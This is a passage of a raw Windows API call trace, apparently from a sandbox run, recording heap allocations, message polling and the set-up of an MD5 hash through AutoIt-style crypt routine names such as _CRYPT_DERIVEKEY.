| out: lpMsg=0x8cf708) returned 0 [0184.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0184.243] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0184.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0184.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0184.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0184.243] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0184.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0184.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0184.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0184.243] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0184.243] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0184.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0184.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0184.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0184.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0184.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0184.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0184.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0184.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0184.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0184.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0184.244] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0184.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0184.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0184.244] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0184.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0184.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0184.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0184.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0184.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0184.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0184.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0184.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0184.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0184.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0184.244] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0184.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0184.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0184.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0184.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0184.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0184.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0184.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0184.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0184.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0184.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0184.245] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0184.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0184.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0184.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0184.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0184.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0184.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0184.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0184.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0184.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0184.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0184.245] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0184.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0184.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0184.245] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0184.245] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0184.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0184.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0184.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0184.245] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0184.246] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0184.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0184.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0184.246] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0184.246] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0184.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd88 [0184.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0184.246] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0184.246] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0184.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0184.246] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0184.246] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0184.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0184.246] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0184.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0184.246] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0184.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0184.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0184.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0184.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0184.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdc0 [0184.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0184.247] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.247] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0184.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0184.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0184.247] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0184.247] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0184.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0184.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0184.247] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0184.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0184.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0184.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0184.284] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0184.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0184.284] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e50b00, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0184.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0184.284] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0184.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0184.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0184.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0184.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0184.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0184.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0184.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0184.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0184.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0184.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0184.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0184.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0184.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0184.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0184.286] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0184.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0184.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0184.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0184.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0184.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0184.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0184.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0184.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0184.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0184.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0184.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0184.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0184.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0184.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0184.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0184.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0184.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0184.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0184.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0184.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0184.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0184.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0184.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0184.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0184.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0184.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0184.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0184.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0184.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0184.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0184.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0184.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0184.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0184.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0184.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0184.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0184.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0184.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0184.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0184.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0184.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0184.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0184.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0184.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0184.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0184.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0184.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0184.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0184.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0184.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0184.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0184.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0184.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0184.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0184.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0184.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0184.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0184.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0184.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0184.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0184.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0184.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0184.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0184.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0184.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0184.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0184.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0184.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0184.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0184.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0184.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0184.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0184.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0184.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0184.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0184.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0184.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0184.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0184.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0184.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0184.289] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0184.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0184.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0184.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0184.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0184.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0184.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0184.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0184.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0184.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0184.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0184.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0184.290] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0184.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0184.290] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0184.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0184.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0184.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0184.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0184.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0184.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0184.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0184.290] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0184.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0184.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0184.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0184.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0184.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0184.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0184.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0184.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0184.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 